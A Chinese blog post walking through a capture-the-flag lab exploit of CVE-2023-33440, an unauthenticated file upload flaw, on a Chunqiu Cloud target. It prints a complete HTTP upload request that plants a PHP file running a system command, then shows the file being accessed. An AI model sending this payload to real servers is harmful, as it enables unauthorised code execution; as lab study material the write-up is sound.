CVE-2023-33440~文件上传【春秋云境靶场渗透】

已于 2024-08-07 21:42:52 修改
阅读量389 收藏
点赞数 15
分类专栏: 春秋云境靶场 文章标签: apache 网络安全 php
于 2024-08-07 08:15:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67832625/article/details/140934774
版权

在这里插入图片描述

# 今天我们来攻破CVE-2023-33440任意文件上传漏洞

image-20240804162626938

# 发现页面什么也没有,那我们只能拿工具开始扫描

image-20240804163343876

# 使用御剑来给他进行目录扫描

image-20240804163512140

# 发现http://eci-2zehtkn8du2v7ycdpatr.cloudeci1.ichunqiu.com/login.php这个有登录页面

image-20240804163614072

# 看到介绍说是未受权上传,大概应该是不用登录就能有漏洞,那么我们直接用burp抓包
# 然后我们搞一个poc
POST /ajax.php?action=update_user HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://XXX/index.php?page=report
Content-Length: 750
Content-Type: multipart/form-data; boundary=---------------------------166782539326470
Connection: close
 
-----------------------------166782539326470
Content-Disposition: form-data; name="id"
 
1
-----------------------------166782539326470
Content-Disposition: form-data; name="firstname"
 
Administrator
-----------------------------166782539326470
Content-Disposition: form-data; name="lastname"
 
a
-----------------------------166782539326470
Content-Disposition: form-data; name="email"
 
admin@admin.com
-----------------------------166782539326470
Content-Disposition: form-data; name="password"
 
admin
-----------------------------166782539326470
Content-Disposition: form-data; name="img"; filename="php.php"
Content-Type: application/octet-stream
 
<?php system("cat /flag");?>
-----------------------------166782539326470--

需要注意poc里面的域名得换成我们自己的,如下图
第二张图箭头前必须把前面的空格删掉,不然不会出结果

image-20240804184622923

image-20240804184348425

最后发现回现

# 我们直接访问
http://eci-2ze9r318c46fnkdif4ei.cloudeci1.ichunqiu.com/assets/uploads/1722767940_php.php

image-20240804184725691

好小子,离成功又近一步!!!

蚂蚱.top
关注
  • 15
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
CVE-2023-33440(任意文件上传
热门推荐
Battery的博客
07-20 2万+
Faculty Evaluation System v1.0 存在未授权任意文件上传漏洞漏洞。
春秋云镜】Faculty Evaluation System未授权任意文件上传漏洞(CVE-2023-33440)
shelbytt的博客
06-12 571
登录邮箱不知道 一般是 admin@admin.com/admin 尝试无果,根据提示是未授权访问文件上传 ,应该不需要登录就能触发漏洞的,看了些漏洞介绍,直接burp suite抓包。因为该靶场没有Write up,索性自己搞一下,方便别人,快乐自己!随便点都没啥东西,索性拿工具扫描下敏感路径。访问shell 地址,拿到flag。只修改IP即可,发包即可上传成功。
WuThreat身份安全云-TVD每日漏洞情报-2023-05-30
wuthreat无胁科技的博客
05-31 823
相关涉及:应用-faculty_evaluation_system_project-faculty_evaluation_system-1.0---相关涉及:系统-fedora_EPEL_8-pdns-recursor-*-Up to-(excluding)-4.8.4-1.el8-TVD_ID=TVD-2023-11764。漏洞编号:CVE-2023-2643,CNVD-2023-41540,CNNVD-202305-1009。漏洞编号:CVE-2023-33355,CNNVD-202305-2217。
CVE-2023-33440详解
a666666688的博客
08-05 420
【代码】CVE-2023-33440
【中危】Spring Kafka 反序列化漏洞 (CVE-2023-34040)
OSCS开源安全社区
08-25 835
墨知是国内首个专注软件供应链安全领域的技术社区,社区致力于为国内数百万技术人员提供全方位的软件供应链安全专业知识内容,包括软件供应链安全技术、漏洞情报、开源组件安全、SBOM、软件成分分析(SCA)、开源许可证合规等前沿技术及最佳实践。墨知通过促进知识共享、技术研究和合作交流,帮助组织和个人提高软件供应链的安全性,减少供应链攻击的风险,并保护软件生态系统的整体安全。
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
CVE-2022-30887漏洞复现
weixin_45177807的博客
11-06 2293
CVE-2022-30887漏洞复现
信也科技基于 Apache SeaTunnel金融场景的应用实践探索
weixin_54625990的博客
09-05 1266
作者:朱俊,信也科技,数据开发专家离线开发一直是数据仓库建设中重要的一个环节。信也科技之前基于Azkaban构建了离线任务调度与开发平台,承载了公司90%以上的离线任务调度需求,以及玄策变量平台的每日变量跑批产出任务。随着时间的积累,任务量级越来越大,Azkaban难以运维与二次开发等问题日渐凸显,给技术同学带来不小的负担。从2023年下半年开始,借助内部创新项目的机会,开展了调度系统引擎升级的项目立项与调研,希望在新调度系统的基础上,进一步规范任务开发流程,提高运维效率,简化全链路血缘。
部署Apache网站
qq_45496140的博客
09-06 835
3.调整apache服务器主文件的配置,在该文件中我们要进行Listen#ServerName#DocumentRoot的配置。这个页面出来了,说明lamp的大环境是没错的,已经搭出来了。2.创建文件编写php网页代码。
APACHE-ATLAS-2.1.0 - 基础运维
记录并分享
09-10 574
(一)SOLR相关 1. 如何创建/删除集合? # 1. 删除 solr/bin/solr delete -c vertex_index solr/bin/solr delete -c edge_index solr/bin/solr delete -c fulltext_index # 2. 创建 solr/bin/solr create -c vertex_index -force -d conf/solr/ solr/bin/solr create -c edge_index -force -d c
JAVA 的excel数据批量导入解析 现在都用什么API工具 Apache POI 、EasyExcel 、easypoi有什么区别
最新发布
qq_39666711的博客
09-10 496
对于大多数需要处理Excel数据批量导入的场景,如果数据量不是特别大,且对性能要求不是特别高,EasyPoi和EasyExcel都是不错的选择。它们都能提供简单易用的API,并且能够很好地满足Excel数据导入的需求。如果数据量非常大,或者对性能有极高要求,那么推荐使用EasyExcel,因为它在处理大量数据时具有更好的性能和更低的内存占用。POI、EasyExcel和EasyPoi。这些工具各有特点,适用于不同的场景和需求。在Java中,处理Excel数据批量导入解析时,常用的API工具有Apache
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8455
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
攻防世界 Web_php_unserialize
beiweixiaotian66的博客
09-07 673
因为GET传参还要经过一个Base64的解码,所以对这个表达式还要经过base64的加密。因为前面还有个正则表达式,所以我们还需要绕过这个正则表达式,使用。然后我们知道怎么绕过了,可不可以直接自己手动绕过,base加密捏。如果表示对象属性个数的值大于真实的属性个数时,就可以绕过。代表着后面的变量名长度应是10,但好像只有八位?表示空字符,但是还是占用一个字符位置。但是这样的base和上面不一样。,这样base出来就是一样的了。方法,写一个反序列化的脚本。这道题我们需要的文件是。,所以我们主要需要绕过。
CVE-2023-33440
06-19
CVE-2023-33440是一个安全漏洞的编号,它通常代表某个软件或系统中的安全漏洞。这些漏洞是由CERT(Common Vulnerabilities and Exposures)项目分配的,用来统一标识全球范围内的信息安全漏洞。然而,由于漏洞的详细...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值